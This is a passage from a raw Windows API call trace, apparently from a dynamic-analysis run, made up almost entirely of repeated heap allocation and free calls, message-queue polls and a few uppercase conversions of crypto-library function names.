[0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0266.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0266.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0266.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f1bf58 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f1d728 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1bf58 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.317] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0266.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0266.318] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.318] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0266.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0266.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0266.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.319] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.319] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0266.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0266.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.320] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0266.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0266.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0266.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f1bf58 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f1eef8 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1bf58 | out: hHeap=0x970000) returned 1 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f1bf58 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1eef8 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c8) returned 0x2f1eef8 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1bf58 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0266.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 